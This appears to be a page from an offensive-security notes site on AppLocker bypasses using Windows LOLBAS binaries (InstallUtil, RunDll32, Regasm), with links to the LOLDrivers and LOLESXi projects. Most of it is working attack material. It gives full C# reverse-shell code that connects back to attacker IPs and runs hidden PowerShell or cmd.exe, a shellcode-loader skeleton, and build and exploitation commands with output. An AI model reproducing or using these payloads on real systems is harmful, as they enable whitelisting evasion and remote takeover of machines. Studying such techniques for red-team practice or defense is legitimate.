> For the complete documentation index, see [llms.txt](https://0xss0rz.gitbook.io/0xss0rz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xss0rz.gitbook.io/0xss0rz/antivirus-evasion-defender/lolbas-loldrivers-lolesxi.md).

# LOLBAS / LOLDrivers / LOLESXi

## LOLBAS

{% embed url="<https://lolbas-project.github.io/>" %}

### InstallUtil

```powershell-session
PS C:\Users\max> Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

FilePath                                                      PolicyDecision MatchingRule
--------                                                      -------------- ------------
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe        Allowed (Default Rule) All files located in the Windows folder
```

Visual Studio - `Project > Add Reference...` menu

`Browse...` and select

```
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll
```

```
using System;
using System.Configuration.Install;

public class NotMalware_IU
{
    public static void Main(string[] args)
    {
    }
}

[System.ComponentModel.RunInstaller(true)]
public class A : System.Configuration.Install.Installer
{

    [DllImport("kernel32")]
    private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

    [DllImport("kernel32")]
    private static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, UInt32 flNewProtect, out UInt32 lpflOldProtect);

    [DllImport("kernel32")]
    private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

    [DllImport("kernel32")]
    private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
    
    public override void Uninstall(System.Collections.IDictionary savedState)
    {
        // Shellcode (micr0_shell)
        string bufEnc = "<SNIP>";

        // Decrypt shellcode
        <SNIP>
    }
}
```

Exploit:

```powershell
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Tools\NotMalware_IU\NotMalware_IU\bin\x64\Release\NotMalware_IU.exe
```

### RunDll32

```powershell-session
PS C:\Users\max> Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path C:\Windows\System32\rundll32.exe

FilePath                         PolicyDecision MatchingRule
--------                         -------------- ------------
C:\Windows\System32\rundll32.exe        Allowed (Default Rule) All files located in the Windows folder
```

{% embed url="<https://github.com/3F/DllExport>" %}

&#x20;`Class Library (.NET Framework)`

<figure><img src="/files/t0HJI193ytYhTrij32ha" alt=""><figcaption></figcaption></figure>

&#x20;`Project > Manage NuGet Packages...`

`Settings` (gear) icon

Uncheck the first two checkboxes

Select package source and select `DllExport`. Next, click `Install` and then Apply

Mark `Installed` checkbox, and then click `Apply`

`Reload All`.

```csharp
using System;
using System.IO;
using System.Net.Sockets;
using System.Diagnostics;
using rundll;

namespace RShell
{
    internal class Program
    {
        private static StreamWriter streamWriter; // Needs to be global so that HandleDataReceived() can access it

        [DllExport("DllMain")]
        public static void DllMain()
        {
            try
            {
                // Connect to <IP> on <Port>/TCP
                TcpClient client = new TcpClient();
                client.Connect("10.10.14.133", 1010);

                // Set up input/output streams
                Stream stream = client.GetStream();
                StreamReader streamReader = new StreamReader(stream);
                streamWriter = new StreamWriter(stream);

                // Define a hidden PowerShell (-ep bypass -nologo) process with STDOUT/ERR/IN all redirected
                Process p = new Process();
                p.StartInfo.FileName = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"; //32-bit version
                p.StartInfo.Arguments = "-ep bypass -nologo";
                p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
                p.StartInfo.UseShellExecute = false;
                p.StartInfo.RedirectStandardOutput = true;
                p.StartInfo.RedirectStandardError = true;
                p.StartInfo.RedirectStandardInput = true;
                p.OutputDataReceived += new DataReceivedEventHandler(HandleDataReceived);
                p.ErrorDataReceived += new DataReceivedEventHandler(HandleDataReceived);

                // Start process and begin reading output
                p.Start();
                p.BeginOutputReadLine();
                p.BeginErrorReadLine();

                // Re-route user-input to STDIN of the PowerShell process
                // If we see the user sent "exit", we can stop
                string userInput = "";
                while (!userInput.Equals("exit"))
                {
                    userInput = streamReader.ReadLine();
                    p.StandardInput.WriteLine(userInput);
                }

                // Wait for PowerShell to exit (based on user-inputted exit), and close the process
                p.WaitForExit();
                client.Close();
            }
            catch (Exception) { }
        }

        private static void HandleDataReceived(object sender, DataReceivedEventArgs e)
        {
            if (e.Data != null)
            {
                streamWriter.WriteLine(e.Data);
                streamWriter.Flush();
            }
        }
    }
}
```

Build: Release - Any CPU (because powershell 32-bit version used)

Exploitation:

```powershell
C:\Windows\System32\RunDll32.exe C:\Tools\rundll\rundll\bin\Release\x86\rundll.dll,DllMain
```

#### Tool - ExecIT

{% embed url="<https://github.com/florylsk/ExecIT>" %}

### Wevtutil.exe

{% embed url="<https://denwp.com/unexplored-lolbas-technique-wevtutil-exe/>" %}

## Regasm - Bypass AppLocker to RShell

{% embed url="<https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/>" %}

{% embed url="<https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html>" %}

Generate a private and a public key pair and these values will be written into a file called key.snk

```powershell
C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools>sn.exe -k key.snk

Microsoft (R) .NET Framework Strong Name Utility  Version 4.0.30319.0
Copyright (c) Microsoft Corporation.  All rights reserved.

Key pair written to key.snk
```

or

```
PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> $Content = [System.Convert]::FromBase64String($key)
PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> Set-Content key.snk -Value $Content -Encoding Byte
```

Projet visual studio `Class Library (.NET Framework)` - Project Name `RegasmDLL`

Change `class1.cs` to `Regasm.cs`

{% embed url="<https://github.com/222222amor/exp_notes/commit/d3471f1d4617fd5423bb85d41b4ec4f8c72332fc>" %}

```csharp
using System;
using System.EnterpriseServices;
using System.IO;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Text;

namespace regsvcser
{
    public class Bypass : ServicedComponent
    {
        public Bypass() { Console.WriteLine("I am a basic COM Object"); }

        [ComRegisterFunction] // This executes if registration is successful
        public static void RegisterClass(string key)
        {
            Console.WriteLine("I shouldn't really execute");
            Shellcode.Exec();
        }

        [ComUnregisterFunction] // This executes if registration fails
        public static void UnRegisterClass(string key)
        {
            Console.WriteLine("I shouldn't really execute either.");
            Shellcode.Exec();
        }
    }

    public class Shellcode
    {
        public static void Exec()
        {
            string serverIp = "10.10.14.166"; // Replace with the attacker's IP
            int serverPort = 8080; // Replace with the attacker's port

            try
            {
                using (TcpClient client = new TcpClient(serverIp, serverPort))
                using (NetworkStream stream = client.GetStream())
                using (StreamReader reader = new StreamReader(stream))
                using (StreamWriter writer = new StreamWriter(stream) { AutoFlush = true })
                {
                    Console.WriteLine("Connected to server");

                    while (true)
                    {
                        // Read command from server
                        string command = reader.ReadLine();
                        if (command == null || command.ToLower() == "exit")
                            break;

                        // Execute command
                        try
                        {
                            var process = new System.Diagnostics.Process
                            {
                                StartInfo = new System.Diagnostics.ProcessStartInfo
                                {
                                    FileName = "cmd.exe",
                                    Arguments = "/c " + command,
                                    RedirectStandardOutput = true,
                                    RedirectStandardError = true,
                                    UseShellExecute = false,
                                    CreateNoWindow = true
                                }
                            };

                            process.Start();
                            string output = process.StandardOutput.ReadToEnd();
                            string error = process.StandardError.ReadToEnd();
                            process.WaitForExit();

                            writer.WriteLine(output);
                            writer.WriteLine(error);
                        }
                        catch (Exception ex)
                        {
                            writer.WriteLine("Error: " + ex.Message);
                        }
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error: " + ex.Message);
            }
        }
    }
}

```

Compile

```powershell
PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /target:library /out:C:\Tools\RegasmDLL\Regasm.dll /keyfile:key.snk C:\Tools\RegasmDLL\RegasmDLL\Regasm.cs
Microsoft (R) Visual C# Compiler version 4.8.4161.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.

This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
```

Exploit

```
PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe /U C:\Tools\RegasmDLL\Regasm.dll
Microsoft .NET Framework Assembly Registration Utility version 4.8.4161.0
for Microsoft .NET Framework version 4.8.4161.0
Copyright (C) Microsoft Corporation.  All rights reserved.

I shouldn't really execute either.
Connected to server
```

## LOLDrivers

Living off the land drivers

{% embed url="<https://www.loldrivers.io/>" %}

## LOLESXi

Living Off The Land ESXi

{% embed url="<https://lolesxi-project.github.io/LOLESXi/>" %}

## Living-off-the-COM-Type-Coercion-Abuse

{% embed url="<https://github.com/andreisss/Living-off-the-COM-Type-Coercion-Abuse>" %}

### Interesting Books <a href="#interesting-book" id="interesting-book"></a>

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**Evading EDR: The Definitive Guide to Defeating Endpoint Detection Systems**](https://www.amazon.fr/dp/1718503342?tag=0xss0rz-21) The author uses his years of experience as a red team operator to investigate each of the most common sensor components, discussing their purpose, explaining their implementation, and showing the ways they collect various data points from the Microsoft operating system. In addition to covering the theory behind designing an effective EDR, each chapter also reveals documented evasion strategies for bypassing EDRs that red teamers can use in their engagements.
